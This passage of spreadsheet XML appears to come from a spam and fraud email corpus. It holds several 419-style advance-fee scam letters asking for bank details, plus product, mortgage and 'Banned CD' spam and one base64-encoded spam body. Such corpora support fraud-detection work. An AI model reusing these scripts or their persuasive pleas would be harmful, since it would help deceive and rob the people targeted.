CAN \nREPLY AND FRENCH TOO\n\nE-MAIL: melika_der_diouf@yahoo.fr\n\n_________________________________________________________________\nTestez Windows Live Mail Beta ! [URL]http://www.ideas.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>302</t>
  </si>
  <si>
    <t>To: kaluidikak@go.com\nFrom: kalu idika &lt;kaluidikak@go.com&gt;\nDate: Tue, 05 Aug 2003 12:20:07 -0700</t>
  </si>
  <si>
    <t>Tue, 05 Aug 2003 12:20:07 -0700</t>
  </si>
  <si>
    <t>kalu idika &lt;kaluidikak@go.com&gt;</t>
  </si>
  <si>
    <t>kaluidikak@go.com</t>
  </si>
  <si>
    <t>Hello, please reply now!</t>
  </si>
  <si>
    <t>{URGENT AND CONFIDENTIAL}\n(RE: TRANSFER OF ($30,000.000.00 USD}\nDear\n\nWe want to transfer to overseas ($30,000.000.00 USD)\nThirty million United States Dollars)from a Bank in Africa,I want to\nask you toquietly look for a reliable and honest person who\nwill be capable and fit to provide either an existing\nbank account or to set up a new Bank a/c\nimmediately to receive this money,even an empty a/c\ncan serve to receive this money, as long as you will\nremain honest to me till the end for this important\nbusiness trusting in you and believing in God that\nyou will never let me down either now or in future.\n\nI am Mr. Kalu Idika Kalu,the Auditor General of a bank in\nAfrica,during the course of our auditing  I\ndiscovered a floating fund in an account opened in\nthe bank in 1990 and since 1993 nobody has operated on\nthis account again,after going through some old files\nin the records I discovered that the owner of the\naccount died without a [heir] hence the money is\nfloating and if I do not remit this money out\nurgently it will be forfeited for nothing.the owner\nof this account is Mr. Vijay Kumar,a foreigner,and\na sailor,and he died,since 1993.and no other person\nknows about this account or any thing concerning\nit,the account has no other beneficiary and my\ninvestigation proved to me as well that Mr. Vijay Kumar, investigation revealed that is an Indian working with Halibuton an oil firm in Nigeria.\n\n\nWe will start the first transfer with $15m upon successful transaction\nwithout any disappoint from your side,we shall\nre-apply for the payment of the remaining rest amount\nto your account,\n\nThe amount involved is ($30,000.000.00 USD)\nThirty million United States Dollars), only I want\nto first transfer $15,000.000 [Fifteen million\nUnited States Dollar from this money into a safe\nforeigners account abroad before the rest,but I don't\nknow any foreigner,I am only contacting you as\na foreigner because this money can not be approved to\na local person here,without valid international\nforeign passport,but can only be approved to any\nforeigner with valid international passport or drivers\nlicense and foreign a/c because the money is in us\ndollars and the former owner of the  a/c  Mr. Vijay Kumar is a foreigner too,and\n the money can only\nbe approved into a foreign a/c.\n\nHowever, we will sign a binding agreement,to bind us\ntogether I got your contact address from the Girl\nwho operates computer, I am revealing this to you\nwith believe in God that you will never let me down in\nthis business,you are the first and the only person\nthat I am contacting for this business,so please\nreply urgently so that I will inform you the next step\n\nto take urgently.Send also your private telephone and\nfax number including the full details of the account\nto be used for the deposit.\n\nI want us to meet face to face to build confidence and\nto sign a binding agreement that will bind us\ntogether before transferring the money to any account\nof your choice where the fund will be safe. Before\nwe fly to your country for withdrawal,sharing and\ninvestments.\n\nI need your full co-operation to make this work fine.\nbecause the management is ready to approve this\npayment to any foreigner who has correct information\nof this account,which I will give to you,upon your\npositive response and once I am convinced that you\nare  capable and will meet up with instruction of  a\nkey bank official who is deeply involved with me in\nthis business.\n\nI need your strong assurance that you will never,\nnever let me down.\n\nWith my influence and the position of the bank\nofficial we can transfer this money to any foreigner's\n\nreliable account which you can provide with assurance\nthat this money will be intact pending our physical\narrival in your country for sharing.The bank official\nwill destroy all documents of transaction immediately\nwe receive this money leaving no trace to any place\nand to build confidence you can come immediately  to\ndiscuss with me face to face after which I will make\nthis remittance in your presence and three of us will\nfly to your country at least two days ahead of the\nmoney going into the account.\n\nI will apply for annual leave to get visa immediately\nI hear from you that you are ready to act and receive\nthis fund in your account.I will use my position and\ninfluence to obtain all legal approvals for onward\ntransfer of this money to your account with\nappropriate clearance from the relevant ministries\nand foreign exchange departments.\n\nAt the conclusion of this business, you will be given\n25% of the total amount,70% will be for me,while 5%\nwill be for expenses both parties might have incurred\nduring the process of transferring.\n\nI look forward to your earliest reply through my\nemail BOX or my alternative email:tbalewa@hotmail.com.\n\nSincerely,\nMr. Kalu Idika Kalu\nPlease call me on my phone # 234-803-35525974immediately you recieve this mail for further details.\n\n\n\n\n\n\n___________________________________________________\nGO.com Mail                                    \nGet Your Free, Private E-mail at [URL]http://mail.go.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>301</t>
  </si>
  <si>
    <t>To: nan\nFrom: DR THOMAS AUDU &lt;thomasaudu@mail.com&gt;\nDate: Tue, 05 Aug 2003 05:13:52 +0200</t>
  </si>
  <si>
    <t>Tue, 05 Aug 2003 05:13:52 +0200</t>
  </si>
  <si>
    <t>DR THOMAS AUDU &lt;thomasaudu@mail.com&gt;</t>
  </si>
  <si>
    <t>STRICTLY CONFIDENTIAL</t>
  </si>
  <si>
    <t>FROM: DR THOMAS AUDU\n No. 300 BOL AHMED WAY \nLAGOS-NIGERIA. \n\nSTRICTLY CONFIDENTIAL\n \nATTN: THE PRESIDENT / C.E.O\n\nI am the Chief Medical Doctor and close confidant of Mrs. Maryam Abacha, the former first lady and wife of the late Gen.Sani Abacha, the former head of state and commander in chief of the armed forces of the Federal Republic of Nigeria. She (MRS. M.ABACHA), has as a result of the trust and confidence,she has in me mandated that I search for a reliable and trust worthy foreign partner, who will help receive some funds which she had in cash totaling US$80M (Eighty Million United States Dollars only) into a personal, company or any reliable foreign bank accounts within or outside your country as all their personal and family Bank accounts within and outside Nigeria have all been frozen by the Nigerian authorities. \n\nFor further information about this money and the ABACHAS) go to [URL]http://www.econdad.org[/URL]\n\nThis money in question has however, been Deposited with a security company that has branches in Africa, Europe and various parts of America. It may also interest you to note that she (MRS. ABACHA) and her family have, since the inception of the present democratic government, been placed under partial house arrest, with their international travelling passports seized pending when the current fund recovery face off between them and the present (RTD) GEN, OBASANJO led Democratic Government is resolved, in which from all indication will not exceed this year. She has decided to offer anybody who will be willing to render this tremendous assistance, 40% of the total sum. Note that this transaction involves no risks whatsoever, as you will have no dealing with my country, Nigeria. Rather you will deal directly with the Security Company, which is based where the money is right now. \n\nLet me have your confidential Tel/Fax numbers in your response to this proposal. I shall let you into a complete detailed picture of this mutual beneficial transaction when I have received your anticipated positive reply. \n\nReply to this e-mail address: thomasaudu@k.ro  .   \n\nThis matter should be treated as urgent and confidential.\n\nRegards,\n\nDR THOMAS AUDU \n\n\n\n</t>
  </si>
  <si>
    <t>http://www.econdad.org</t>
  </si>
  <si>
    <t>442</t>
  </si>
  <si>
    <t>To: JOHN1@fate.mr.itd.UM, YORMIE@fate.mr.itd.UM\nFrom: issacwimpoehato@yahoo.com\nDate: Tue, 04 Nov 2003 08:36:03 -0500</t>
  </si>
  <si>
    <t>Tue, 04 Nov 2003 08:36:03 -0500</t>
  </si>
  <si>
    <t>issacwimpoehato@yahoo.com</t>
  </si>
  <si>
    <t>JOHN1@fate.mr.itd.UM, YORMIE@fate.mr.itd.UM</t>
  </si>
  <si>
    <t>YOUR ATTENTION URGENTLY NEEDED.      quintman</t>
  </si>
  <si>
    <t>REPLY TO:  john.wimpoe@caramail.com\n                  wimpoejohn2@rediffmail.com\n\nFROM:      MR JOHN KELU\nCOUNTRY:   (BENIN REPUBLIC)\nBENIN REPUBLIC TEL:  +229-481137\nSATELLITE TEL:  +88216-46689736\n\nMy name is MR JOHN KELU from LIBERIA, a Country in WEST \nAFRICA. I am in a hide out now in BENIN REPUBLIC, \na neighboring Country in the same West African. I have \nLarge sum of money for INVESTMENT. The money is in \nMillions of U.S. dollars. I need Your help urgently for \nboth SAFE KEEPING and INVESTING this money in your country. \nI cannot move about freely now for reasons i will explain \nto you later.\n\nMy Uncle is MR JOHN Y. WINPOE. He was a former DEPUTY \nMINISTER OF NATIONAL SECURITY in LIBERIA. My Uncle made\nthis money from DIAMOND BUSINESS while he was a DEPUTY \nMINISTER OF NATIONAL SECURITY. \nHe was falsely accused of plotting to remove the then \nPRESIDENT OF LIBERIA (PRESIDENT CHARLES TAYLOR) from office.\nWithout trial, he was killed by Charles Taylor. You can \nverify this from LIBERIAN EMBASSY in your country. You can \nalso check in some of the international news papers posted \nin the web sites bellow:\n\n[URL]http://www.usatoday.com[/URL]\n[URL]http://www.unwire.org[/URL]\n \nYou are one of the three email contacts given to me by a \nCyber Cafe' operator on my request for a foreign contact. \nShe did not tell me your name or country of origin. Though \nI did not tell her why I needed the contact of any foreigner.\n\nBecause of the urgent and confidential nature of this\nbusiness, you are advised to keep everything secret for \nnow. If you are interested in doing this business with me, \nkindly reply immediately to my two email Addresses:\n\njohn.wimpoe@caramail.com   OR   wimpoejohn2@rediffmail.com\n\nAfter that, i will send you all the details about this business.\nYou may if you so wish call me any time on my satellite \nphone:  +88216-46689736. This is a THURAYA satellite phone. \nYou can get THURAYA TELEPHONE easily by calling with AT&amp;T, \nWORLDCOM, or SPRINT Telephones. Your Telephone Company will \nadvice you.\n\nAs from Tuesday (11/11/2003), I will be in the city.\nOnly then can you get me on My BENIN REPUBLIC telephone \nnumber: +229-481137\n\nThanks while waiting for your immediate reply.\n\nMR JOHN KELU (For the Family).\n\n\n</t>
  </si>
  <si>
    <t>120</t>
  </si>
  <si>
    <t>To: chinaeke7@juno.com\nFrom: chinaeke7@juno.com\nDate: Tue, 04 Mar 2003 04:29:23 +0000</t>
  </si>
  <si>
    <t>Tue, 04 Mar 2003 04:29:23 +0000</t>
  </si>
  <si>
    <t>chinaeke7@juno.com</t>
  </si>
  <si>
    <t xml:space="preserve">REPLY UNGENT   </t>
  </si>
  <si>
    <t>dear sir\n\nI STRONGLY BELIVE THAT THIS MESSAGE WOULD COME TO YOU AS A SURPRISE IN FACT IT IS  IN RESPECT OF THE STRICT CONFIDENCE GIVE TO ME OF YOUR HONEST AND VERSATILE IN BUSINESS THAT MOTIVATED MY INTEREST TO SEEK YOUR CO-OPERATION ON A TRANSACTION.\n\nMY FATHER IS LATE CHIEF JAMES A. BIKO. HE WAS THE CHARMAN OF NIGERIA PETROLEUM MONITORING COMMITTEE (NPMC). SADLY HE DIED AFTER A BRIEF ILLNESS ON OCTOBER (LAST YEAR) AND HE WAS BURIED, IN OUR HOME TOWN ON NOVEMBER 17TH 2002 AS YOU MIGTH HAVE KNOWN THAT PETROLEUM IS THE MAJOR REVENUE SOURCE IN NIGERIA. MY FATHER MADE A LOT OF MONEY THROUGH THE JOB. BUT COULD NOT INVEST THE MONEY IMMEDIATELY TO AVOID PROBE BY THE MILITARY GOVERNMENT. HE WAS ABLE TO SAVE THE SUM OF $32,000,000.00 (THIRTY TWO MILLION UNITED STATES DOLLARS ). HE DEPOSITED THIS  SUM WITH A SECURITY COMPANY. THE DOCUMENTS USED IN THIS DEPOSITION TOGETHER WITH THE  KEY OF THE SAVE IS  WITH MY MOTHER.\n\n\nIN MY FATHER'S WILL HE INSTRUCTED THAT THIS MONEY MUST BE INVESTED OVERSEAS WITH THE HELP OF A FORIGNER WHO IS RELIABLE AND TRUSTWORTHY, TO AVOID EEN KILLED BY MY RELATIONS  WHO MAY BE EYING ME BADLY. BASED ON THIS I NOW SEEK FOR YOUR COOPERATION. I LIKE YOU TO COME  DOWN TO NIGERIA SO THAT WE CAN OPEN A DOMICILIARY ACCOUNT WITH YOUR NAME HERE IN NIGERIA. AND THEN CLAIM DEPOSIT THE MONEY INTO THE DOMICILIARY ACCOUNT FOR TRANSFER TO ANY FOREIGN ACCOUNT EHICH YOU EILL PROVIDE. I AND YOU WILL THEN TRAVEL TO YOUR COUNTER TOGETHER FOR SHARING OF THE MONEY I AND MY MOTHER HAVE CONCLUDED TO GIVE 25% OF THE TOTAL SUM TO YOU, WHILE 75% EILL BE FOR ME, THEN 5% WILL STAND FOR BOTHLOCAL AND INTERNATION EXPENSES. REPLY UNGENT TO INDICATE YOUR INTEREST IN THIS  TRANSACTION THROUGH MY PRIVATE EMAIL ADDRESS AT chinaeke12@juno.com OR YOU REPLY TO MY MOTHER AT mrsbiko@juno.com IF YOU CANNTO COME TO NIGERIA WE CAN STILL FIND ANOTHER SOLUTION IN  OTHER TO TRANSFER THE MONEY INTO YOUR FOREIGN AC!\nCOUNT. IF YOU HAVE INTEREST.\n\n\nTHANKSS FOR YOUR COOPERATION\n MR.CHINAEKE BIKO\n\n\n\n\n\n\n\n________________________________________________________________\nSign Up for Juno Platinum Internet Access Today\nOnly $9.95 per month!\nVisit [URL]www.juno.com[/URL]\n\n</t>
  </si>
  <si>
    <t>www.juno.com</t>
  </si>
  <si>
    <t>5080</t>
  </si>
  <si>
    <t>To: &lt;engineer@netnovations.com&gt;, &lt;serpent@netnomad.com&gt;,\nFrom: "Special Buy" &lt;SpecialBuy@tuxtla.com&gt;\nDate: Tue, 04 Jun 2002 06:34:00 -1700</t>
  </si>
  <si>
    <t>Tue, 04 Jun 2002 06:34:00 -1700</t>
  </si>
  <si>
    <t>"Special Buy" &lt;SpecialBuy@tuxtla.com&gt;</t>
  </si>
  <si>
    <t>&lt;engineer@netnovations.com&gt;, &lt;serpent@netnomad.com&gt;,</t>
  </si>
  <si>
    <t>Protect Your Computer With Norton Systemworks 2002</t>
  </si>
  <si>
    <t>|  \n  \n**Norton System Works**  \n---  \n|  |\n\n**A complete problem-solving suite for advanced us= ers and small\nbusinesses.**  \n---  \n  \n![](3D"[URL]http://www.usavem[/URL] |  |\n\n**Norton System Works Features:**  \n---  \n  \n  * **Norton Anti= Virus** protects your PC from virus threats\n  * **Norton Util= ities** optimizes PC performance and solves problems\n  * **Norton Clea= nSweep** cleans out Internet clutter\n  * **GoBack** = by Roxio provides quick and easy system recovery\n  * **Norton Ghos= t** clones and upgrades your system easily\n  * **WinFax** = **Basic** sends and receives professional-looking faxes\n\n  \n  \n**Order Today**  \n---  \n  \n**$300.00 + Value**  \n  \n**Your Price- $29.99**  \n  \n---  \n  \n---  \n  \nClick here to unsubscribe f= rom these mailings.\n\n</t>
  </si>
  <si>
    <t>http://www.usavem</t>
  </si>
  <si>
    <t>5077</t>
  </si>
  <si>
    <t>To: &lt;chrbader@telecom.at&gt;\nFrom: "irese" &lt;gort44@excite.com&gt;\nDate: Tue, 04 Jun 2002 00:18:34 -1600</t>
  </si>
  <si>
    <t>Tue, 04 Jun 2002 00:18:34 -1600</t>
  </si>
  <si>
    <t>"irese" &lt;gort44@excite.com&gt;</t>
  </si>
  <si>
    <t>&lt;chrbader@telecom.at&gt;</t>
  </si>
  <si>
    <t>Cash in on your home equity</t>
  </si>
  <si>
    <t>Mortgage Lenders &amp; Brokers Are Ready to\n        compete for your business.\n\nWhether a new home loan is what you seek or to refinance\nyour current home loan at a lower interest rate, we can help!\n\nMortgage rates haven't been this low in years take action now!\n\nRefinance your home with us and include all of those pesky\ncredit card bills or use the extra cash for that pool you've \nalways wanted...\n\nWhere others say NO, we say YES!!!\nEven if you have been turned down elsewhere, we can help!\n\nEasy terms!  Our mortgage referral service combines the\nhighest quality loans with the most economical rates and\nthe easiest qualifications!\n\nTake just 2 minutes to complete the following form.\nThere is no obligation, all information is kept strictly\nconfidential, and you must be at least 18 years of age.  \nService is available within the United States only.\nThis service is fast and free.  \n\nFree information request form:\nPLEASE VISIT\n\n[URL]http://builtit4unow.com[/URL]\n****************************************************************\nSince you have received this message you have either responded\nto one of our offers in the past or your address has been\nregistered with us.  If you wish to "OPT_OUT" please visit:\n[URL]http://builtit4unow.com[/URL]\n****************************************************************</t>
  </si>
  <si>
    <t>http://builtit4unow.com http://builtit4unow.com</t>
  </si>
  <si>
    <t>5083</t>
  </si>
  <si>
    <t>To: &lt;webmaster@efi.ie&gt;\nFrom: &lt;cali@coinet.com&gt;\nDate: Tue, 04 Jun 0102 23:35:33 -0800</t>
  </si>
  <si>
    <t>Tue, 04 Jun 0102 23:35:33 -0800</t>
  </si>
  <si>
    <t>&lt;cali@coinet.com&gt;</t>
  </si>
  <si>
    <t>I could be JAILED for selling this CD!</t>
  </si>
  <si>
    <t>Dear fellow eBay user,\n\nI listed this CD on eBay a few months ago and here's \nwhat happened.  I got an email from Safeharbor saying \nthat all my auctions had been cancelled and that the CD \nwas permanently "banned" from being sold on eBay.  From \nthen on, I called it the "Banned CD"!\n\nSo why did eBay ban it?  Maybe they figured you shouldn't \nhave access to this type of information, or maybe they \ndidn't think we could cram all of these programs onto \none CD Rom.  I'll let you decide.\n\nThis CD will teach you things that eBay, Uncle Sam, and \nothers just don't want you to know.  I am not responsible \nfor how you use some of this information and it is \nprovided for educational purposes only.  Here are just a \nfew of the things you will learn ...\n\n*** Find confidential info on anyone in 30 minutes or \nless on the Internet.  \n\n    You'll be able to track down your old flame, find \n    out how much money your ex is hiding in their bank \n    account, or run a background check on proespective \n    client or employee.  Even government agencies have \n    trouble obtaining much of this information.  You \n    will have all the resources of any professional \n    investigator right at your fingertips - on your \n    home computer!\n\n*** List of companies who will issue you a college \n    degree (including a Phd.) for a fee.  No study \n    required!\n\n*** Learn how to get FREE cable and DSS channels, \n    including the adult stations and Pay-Per-View!\n \n*** List of suppliers of "questionable" items, such as \n    fcc banned communications devices, scanners, night \n    vision goggles, passports, fake identification, and \n    everything else that you won't find in the back of \n    Soldier of Fortune magazine!\n\n*** Find products to resell on the Internet with our \n    Wholesale Directory containing over 1 million \n    (that's right, one million!) wholesale sources for \n    computers, electronics, beanies, trend items, \n    jewelry, cars, collectibles, and everything else!  \n\n*** Over 25 million email addresses, fresh and targeted!\n    You can use these to contact the people and send \n    them your advertisements.\n\n*** Find out how to get a completely new identity.  \n    Disappear without a trace!\n\n*** Find out how to ERASE bad credit and even create a \n    whole new file in the credit bureau computers.\n\n*** Learn how to beat the IRS. Tax tips for the rest of\n    us.\n\n*** Complete guide on how to claim public land offered \n    by the Government. You can find your dream home for\n    a ridiculously low price or buy properties to resell\n    for a huge profit! \n\n*** Accept checks from your customers by fax, phone and\n    email with the full working version of Checker \n    Software included!\n\n*** Business software to help you run your small business, \n    including label maker software, money management software, \n    IRS forgiveness program, database software, and much more.\n\n*** A huge collection of screensavers, graphics, clipart, \n    and desktop themes to spice up your computer.\n\n*** MUCH, MUCH MORE that we don't have room to list!\n\nAsk yourself this question: where else will you find such\na HUGE collection of information and software on one CD? \nAnd who else would dare sell you a CD containing so much \n"contraband" info?  It was banned on eBay, has been \nprohibited in THIRTY THREE countries, and will soon be \nunavailable in the USA. If you wait more than a few days\nto order this CD, I can't guarantee I will be able to \nsell it.  Get this CD *** NOW *** before it is banned forever!\n\nWe accept Visa/Mastercard, Paypal, or cash/check/money order. \nTo order the "Banned CD" right now for the super low price of \nonly $19.99, Click on the link below to pay with a \nVisa or Mastercard. This will take you to our secure \nserver for order processing: \n\n[URL]http://tv-discounters.com[/URL]\n\nIf you have trouble accessing the link above,\nplease try this url instead:\n\n[URL]http://www.tv-discounters.com[/URL]\n\nOr you may send cash, check or money order by filling out\nthe order form below.\n\n------------------------- CUT HERE -----------------------\n\n"Banned CD"\nPrice: $19.99 + $4.01 Shipping\n\nHOW TO ORDER BY MAIL: Print out this order form and\nsend cash, personal check, money order or cashier's\ncheck to the address listed below:\n\nQuiksilver Enterprises\n816 Elm St. #472\nManchester, NH 03101\n\nYour Shipping Information:\n\nYour Name_____________________________________________\n\nYour Address__________________________________________\n\nYour City_____________________________________________\n\nState / Zip___________________________________________\n\nPhone #: _____________________________________________\n(For problems with your order only. No salesmen will call.)\n\nEmail Address_________________________________________\n\nNOTE: Shipping is delayed by up to ten days on all mail-in \norders.\n\n[ ] YES! Please rush order my "Banned CD"!!\n\n* Please check one of the following payment options:\n\n[ ] I am mailing my credit card number. (Note your \ncard will be charged for $24.00)\n\n[ ] I am enclosing a check or money order for $24.00\n\n\nIf paying by credit card, please fill in the information \nbelow:\n\n\nCredit Card Number:________________________________\n\nExpiration Date:___________________________\n\nSignature:_________________________\n\nDate:____________________\n\n\nNOTE: This CD is for informational, educational, or \nentertainment purposes only.  Some of the activities\ndescribed on this CD may be illegal if carried out.\nThis CD contains links and addresses of companies\nand individuals which produce various products, or\noffer various services, which may be illegal in your\ncountry, state, or city.  However, it is perfectly \nLEGAL to purchase and possess the Banned CD in the \nUnited States of America.  Contains approximately \n100 megs of information.\n\nShipping outside USA add $10.00\n\nSend an email to "affiliate5@btamail.net.cn"\nif you no longer wish to receive these mailings.\n\n{%rand%}\n\n\n\n3084CCld6-429PrXi6858xaVB5-06l27</t>
  </si>
  <si>
    <t>http://tv-discounters.com http://www.tv-discounters.com</t>
  </si>
  <si>
    <t>5075</t>
  </si>
  <si>
    <t>To: &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: ggkkvvmm0880p25@aol.com\nDate: Tue, 04 Jun 0102 21:41:59 +1000</t>
  </si>
  <si>
    <t>Tue, 04 Jun 0102 21:41:59 +1000</t>
  </si>
  <si>
    <t>ggkkvvmm0880p25@aol.com</t>
  </si>
  <si>
    <t>(---) 8_x0003_._x001E_®_x0001_ 500   1_x0005_8_x0002_ 3^ô_x0003_                                 1735jSOB8-522qsvT41-18</t>
  </si>
  <si>
    <t>MDIyOVpnenYyLTU2OEhHSlQyNjI2aUtLVDYtOTgxZXVRQzg1NTRsMzYNCjxodG1sPg0KPGhl\nYWQ+DQoJPHRpdGxlPlVudGl0bGVkPC90aXRsZT4NCjwvaGVhZD4NCjxib2R5IGxpbms9Ymx1\nZSB2bGluaz1ibHVlPg0KPHRhYmxlIHdpZHRoPTU1MD4NCjx0cj48dGQ+DQo8cD48Zm9udCBj\nb2xvcj1yZWQ+PGI+wMy44biuvbrGriA1MDC4uLCzIDS4uL/4v6Egxsu0z7TZLjwvYj48L2Zv\nbnQ+PC9wPg0KPHA+x9G43sDPwLogyK69x8fPsNQgwaawxbXHvu4gwNaxuL+pLiDB37q5wLog\nx8+zqrXOIL74sbi/qS4NCjxicj656bi4sLO+vyC5rb7uvK0gxsTAzyA1sLO3ziCxuLy6tce+\n7sDWvcC0z7TZLiDGxMDPIMfRsLO05yAyMLjesKHBpLW1ILXLtM+02S4NCjxicj6x17evtM+x\n7iDD0SAxMDC43rChwaS1tSC1y7TPtNkuIMDUsd3Hz73DuOkgudm3ziDAzb26x8O3zr7ut84g\ntNm/7rnesNQgx9i15biztM+02S48L3A+DQo8cD6/5MHyIMGmtaW3ziDBpLiutbUgvsi1yCC1\n5bevv+4guK69usausKEguLnAurWlv6kuILHXt7GwxbTCIMDMuOG4rr26xq6woSC/qbevsLMg\ntNm02rTZtNogutm+7sDWsO0gwOK02cfRILO7v+vAzCC4tyC8r7+pwNbBri4gvsa4tiC+xr3D\ntMIgutDAuiC+xr3Hsqi/ob+pLiC537zbseK3ziC4rr26xq64piDA0MC7tvOw7SDH2LW1IMDQ\nx/TB9sH2tbUgvsrBri4gwaayqLTCIMfRwdm/oSDBpMiuyPcgwMy44cfRsLO+vyDA3yDBpLiu\ntce+7sDWvu6/qS4guvPB2cDMs6ogwMy44cHWvNK/t7+hILrzxK21tSC++L7uv6kuIMGmsKEg\nwffBoiDD38Pix9Gwxb+hv6kuIMDMuOG4rr26xq4gvsi/oSC2sLW1tMIgs8rA+rrQx8+w1CC6\n2b7uwNa0wiDA4rTZx9Egs7u/67W1ILTnv6zI9yC++L3AtM+02S4gv+u1tyDBuyC5+rbzsbgg\nxsi287DtIMfPtM+x7r+pILzux8649MfPvcOwxbOqILHXt7G60LXpILi5wMwgv6y29MHWvLy/\nqS4gPC9wPg0KPHA+wda5rrnmuf3AuiC+xrehwda80rfOILmuwMfH2MHWvLy/5Dxicj4NCr+s\ntvTDszogPGEgaHJlZj1tYWlsdG86dGVjaHRveUBuYXZlci5jb20+dGVjaHRveUBuYXZlci5j\nb208L2E+DQo8L2E+PC9wPg0KDQo8L3RkPjwvdHI+PC90YWJsZT4NCjxiciBjbGVhcj1sZWZ0\nPg0KPHRhYmxlIHdpZHRoPTU1MCBiZ2NvbG9yPSNjY2ZmY2MgY2VsbHBhZGRpbmc9MTA+PHRy\nPjx0ZD4NCjxwPsL8sO3A+8C4t84sIMDMufi/oSDAzLjhxsS0wiCwxbTCIDHC97G4v6ksIDLC\n9yA1MDC4uLCzILiuvbrGrrW1IMHYuvHB38DMtM+x7r+pLDxicj4NCsDMsM21tSDHyr/kx9Eg\nutDAuiC5zLiuIL+5vuDH2MHWvLy/qS48YnI+wdi68bXHtMIgtaW3ziC52bfOIL+stvS15bix\nsrK/qS48YnI+DQoxwve4rr26xq60wiC55rHdIMPfw+KzobOtILv9u/3H0bDMtM+02S48YnI+\nDQo8YnI+wPq0wiDD38PiseK3ziDAzsXNs92787+hvK0gw9/D4sfRILDNuLggxsi+xr+pLiCx\n1yC/3L+hILCzwM7BpLq4tMIgurjAr8fPsO0gwNbB9iC+yr3AtM+02S4gDQq/wMfYvvjAuL3D\nseIgudm2+LTPtNkuIF5ePC9wPjwvdGQ+PC90cj48L3RhYmxlPg0KPGJyIGNsZWFyPWxlZnQ+\nDQo8dGFibGUgd2lkdGg9NTUwPjx0cj48dGQ+PHA+waS6uMXrvcW6ziCxx7DtILvnx9e/oSDA\nx7DFIMGmuPG/oSBbsaSw7V0gtvOw7SDHpbHix9EgsaSw7SC43sDPwNS0z7TZLjxicj4NCiC8\n9r3FwLsgv/jEob7KwLi46SA8YSBocmVmPSJtYWlsdG86cmVtb3ZlMTIzQG9yZ2lvLm5ldD9T\nVUJKRUNUPbz2vcWwxbrOIj689r3FsMW6zjwvYT64piC0rbevIMHWvLy/5C4gPGJyPjxicj48\nZm9udCBzaXplPTI+PGI+v+y4rsDHILz2vcWwxbrOv+TDuyDDs7iuuea5/TogvPa9xbDFus63\nziC16b7uv8IgwMy44bXpwLogwda80rz2wf2x4r+hIMDHx9i8rSDA2rW/wLi3ziC6uLO9u+e2\n9yDB1rzSuLjAzCC89sH9tcggyMQgvPa9xbDFus64rr26xq63ziC48L7Gwf20z7TZLiC02cC9\nIMDMuOG537zbvcMgx8rFzbi1wLsgxevHz7+pILz2vcWwxbrOwNq4piC537zbuK69usauv6G8\nrSC76MGmx9EgyMQgud+828fVtM+02S48L2I+PC9mb250PjwvcD4NCjxwPiBUbyByZW1vdmUg\neW91cnNlbGYgZnJvbSB0aGlzIG1haWxpbmcgbGlzdCwgZW1haWwgdG8gPGEgaHJlZj0ibWFp\nbHRvOnJlbW92ZTEyM0Bvcmdpby5uZXQ/c3ViamVjdD1SRU1PVkUiPnJlbW92ZTEyM0Bvcmdp\nby5uZXQ8L2E+IHdpdGggdGhlIHdvcmQgInJlbW92ZSIgaW4gdGhlIHN1YmplY3QgbGluZS48\nL3A+PC90ZD48L3RyPjwvdGFibGU+PGJyPg0KDQoNCg0KDQo8L2JvZHk+DQo8L2h0bWw+DQoN\nCjI1OTNrYlRFNC03OTRnUmFJNDg4MFNhRkI2LTgzNXBTck4zNzM2TVNocjAtMTMyVnBRcDky\nNDdsSXlvNy05MzJHdXdUMDc3MHN0RWtsNzINCg==\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2290</t>
  </si>
  <si>
    <t>To: nan\nFrom: Bene Jones &lt;benejones707@adinet.com.uy&gt;\nDate: Tue, 04 Jul 2006 12:14:57 -0300</t>
  </si>
  <si>
    <t>Tue, 04 Jul 2006 12:14:57 -0300</t>
  </si>
  <si>
    <t>Bene Jones &lt;benejones707@adinet.com.uy&gt;</t>
  </si>
  <si>
    <t>Dearest in Christ, pls treat with a honest mind</t>
  </si>
  <si>
    <t>Dearest in Christ, pls treat with a honest mind\nCalvary greeting to you and your family. My name is Mrs bene jones, a\nscottish, but I am married to Mr jones who is the Managing Director of\nShell Petro-Chemical Company, before he died in the plane crash of Oct \n23, 2005 with Bellview Airlines twin-engine Boeing 737] with other \npassengers aboard all 117 passage died, as you can confirm it yourself \nthrough this website [URL]http://edition.cnn[/URL]\ncom/2005/WORLD/africa/10/23/nigeria.plane/\nhttp://www.washingtonpost.\ncom/wpdyn/content/article/2005/10/23/AR2005102300368.html  We were \nmarried for eleven years without a child. Before the death we were both \nborn again Christians. When my late husband was alive we deposited the \nsum of USD$16.5Million (Sixteen Million Five hundred thosand U.S. \nDollars) with one of good bank here in Nigeria. Presently, this money \nis still with Union Bank of Nigeria.\nRecently, my Doctor told me that I would not last for the next three \nmonths due to cancer problem. Though what disturbs me most is my \nstroke. Having known my condition I decided to donate this fund to \nchurch or better still Christian individual that will utilize this \nmoney the way I am going to instruct here in.\nI want a church that will use this fund to churches, orphanages, \nResearch centres and widows propagating the word of God and to ensured \nthat the house of God is maintained. The Bible made us to understand \nthat blessed is the hand that griveth.\nI took this decision because I don't have any child that will inherit \nthis money and my husband relatives are not Christians and I don;t want \nmy family hard earned money to be misused by unbelievers.I don't want a \nsituation where this money will be used in an ungodly manner. Hence the \nreason for taking this bold decision. I am not afraid of death hence I \nknow where I am going. I know that I am going to be in the bosom of the \nLord. Exodus 14 VS 14 says that the lord will fight my case and I shall \nhold my peace. I don't need any telephone communication in this regard \nbecause of my health because of the presence of my family relatives \naround me always. I don't want them to know about this development.With \nGod all things are possible.  As soon as I receive your reply. Ishall \ngive you the contact information of the bank and whom to contact.\nI will also need to get a reliable attorney to assist you as the new\nbeneficiary of this fund. I want you and the church to always pray for \nme because the lord is my shepherd. My happiness is that I lived a life \nof a worthy Christian.Whoever that wants to serve the Lord must serve \nhim in spirit and truth. Please always be prayerful all through your \nlife. Any delay in your reply will give me room in sourcing for a \nChristian individual for this same purpose.\nPlease assure me that you will act Accordingly as I stated here.\nExpecting to hearing from you, reply back to my alternative email for \nsecurity purpose.\n\nevangelistbenejones@yahoo.com.hk \nRemain blessed in the name of the Lord.\nYours in Christ,\nSister bene jones\n\n\n</t>
  </si>
  <si>
    <t>http://edition.cnn</t>
  </si>
  <si>
    <t>86</t>
  </si>
  <si>
    <t>To: R@M\nFrom: nan\nDate: Tue, 04 Feb 2003 07:09:06 -0500</t>
  </si>
  <si>
    <t>Tue, 04 Feb 2003 07:09:06 -0500</t>
  </si>
